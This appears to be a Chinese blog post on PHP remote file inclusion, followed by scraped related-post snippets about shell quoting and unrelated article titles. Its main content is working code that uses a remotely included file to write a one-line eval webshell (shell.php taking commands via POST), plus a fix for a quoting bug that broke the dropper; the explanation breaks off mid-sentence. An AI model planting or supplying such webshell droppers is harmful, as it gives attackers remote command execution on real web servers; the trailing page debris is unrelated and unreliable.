远程包含shell
需要allow_url_open=On,才可以尝试远程包含一句话木马:
http://www.xxx.com/echo.txt, 代码如下。

<?php
fputs (fopen("shell.php","w"),'<?php eval($_POST[cmd]);?>')
?>

或者

<?php
$b='<?php eval($_POST[cmd]);?>';
$a=fopen('shell.php','w');
fputs($a,$b);
fclose($a);
?>

其中出现了报错,实际是因为一开始的代码是这样的。归根结底是单引号和双引号的问题

<?php
fputs (fopen("shell.php","w"),"<?php eval($_POST[cmd]);?>")
?>

双引号里面的字段会经过编译器解释,然后再当作HTML代码输出。 单引号里面的不进行解释,直接输出。 通俗点来说就是双引号里的变量会执行,单引号里的不会执行,相当于字符串 如果把一句话木马用双引号包起来,那么执行php代码的时候,他会执行$_POST[cmd],又因为没有POST没有接收到值所以变空。

如果变为单引号,执行php代码时则为:

远程包含shell时,上传shell时所遇到一句话木马不能上传问题解决的办法(这里为单引号与双引号问题)相关推荐

  1. shell字符串中同时包含单引号和双引号的一种处理方法

    字符串的几种标识方法 我们知道在shell中表示字符串一般是用单引号或者是双引号放在整个字符串的开头和结尾. 如果字符串中只包含单引号,那么可以用双引号括起来. 同理如果字符串中包含双引号可以用单引号 ...

  2. python创建包含双引号的字符串代码_python 字符串组成MySql 命令时,字符串含有单引号或者双引号导致出错解决办法...

    引用自:https://blog.csdn.net/zhaoya_huangqing/article/details/48036839 一.在组成SQL语句并发送命令时完全按照Python中的样式去传 ...

  3. linux shell中的单引号与双引号的区别(看完就不会有引号的疑问了)(转)

    tips: ============================= IFS - LINUX字段分隔符,内部字段分隔符 IFS(Internal Field Seperator)在Linux的she ...

  4. bash shell基本语法之单引号、双引号和倒引号的区别及使用

    前言 在bash shell基本语法之特殊变量的使用的一些示例中,使用echo输出一些字符串的时候,既使用了单引用也用了双引号,这篇博文简单说下这两个的区别,顺便说下倒引号的用法 单引号与双引号 在使 ...

  5. Linux Shell - 单引号 ( ‘ )、双引号 ( “ ) 和反引号 ( ` )

    Linux Shell - 单引号 ( ' ).双引号 ( " ) 和反引号 (`) Bash 只有一种数据类型,即字符串.用户输入的数据,Bash 都视为字符串. 1. 单引号 (') 单 ...

  6. 【Linux】Shell(Bash)单引号、双引号、不加引号和反引号用法和区别详解

    简要总结 不加引号:不会将含有空格的字符串视为一个整体输出, 如果内容中有变量等,会先把变量解析出结果,然后在输出最终内容来,如果字符串中带有空格等特殊字符,则不能完整的输出,需要改加双引号,一般连续 ...

  7. 描述linux shell单引号,Linux shell 单引号和双引号

    在编写shell脚本的时候经常会用到引号,有些时候却老是忘记单引号和双引号之间的区别, 所以就整理一下供以后脑子不好使了的时候前来复习一下.首先说下他们的共同点: 好像就只有 一个,就是它们都可以用来 ...

  8. shell 引号 解析 逗号_关于shell的单引号和双引号转义 以及特殊符号相关

    关于shell的单引号和双引号转义 以及特殊符号相关 20140603 Chenxin shell转义,单引号与双引号,反撇号 1.转义 单引号和双引号都能关闭shell对特殊字符的处理. 不同的是, ...

  9. linux bash shell中,单引号、 双引号,反引号(``)的区别及各种括号的区别

    一.单引号和双引号 首先,单引号和双引号,都是为了解决中间有空格的问题. 因为空格在linux中时作为一个很典型的分隔符,比如string1=this is astring,这样执行就会报错.为了避免 ...

最新文章

  1. 帕斯卡三角形与道路问题
  2. Windows在结构Eclipse+Android4.0开发环境
  3. 微服务实践分享(1) 概况
  4. python深度学习环境支撑列表 各版本对应关系,Keras,TensorFlow,pytorch ,caffe等。
  5. ASP实例:6行代码实现无组件上传
  6. 用python写用手机发邮件_如何用python写发邮件?
  7. 伦敦大学学院计算机残疾,伦敦大学学院残疾、设计和创新理学硕士
  8. java反编译工具jd-gui-osx for mac M1芯片无法使用的两个问题场景
  9. python微信语音转发方法_最简单的微信语音转发方法,保证看一遍就会
  10. YOLO算法v1-v3原理通俗理解
  11. lync 2013标准版安装
  12. Mob免费短信验证教程
  13. 【CCF会议期刊推荐】中国计算机协会(CCF)推荐国际学术期刊/会议(软件工程/系统软件/程序设计语言)
  14. 服务器的使用:Linux一键搭建KMS激活服务器
  15. java list筛选数据_java 根据条件在List中筛选出符合条件的对象
  16. 数据挖掘实验:使用 Hadoop 实现 WordCount 应用
  17. svn resolved filename or directory that gives trouble
  18. 人工智能 —— 语义网络表示法
  19. 菜鸟吐槽一下hao123
  20. Qt之Windows下禁用中文输入法

热门文章

  1. 《剑指offer》反转链表
  2. OpenCV实现简单人脸检测
  3. SpringCloud教程 | 第二篇: 服务消费者(rest+ribbon)
  4. 聊聊JVM(六)理解JVM的safepoint
  5. Elasticsearch常用工具清单
  6. 将Python脚本打包成可执行文件
  7. Windows 10 to Go
  8. 求最大值及其下标编程总结
  9. JavaScript闭包函数的理解与使用
  10. MySQL5.7参数log_timestamps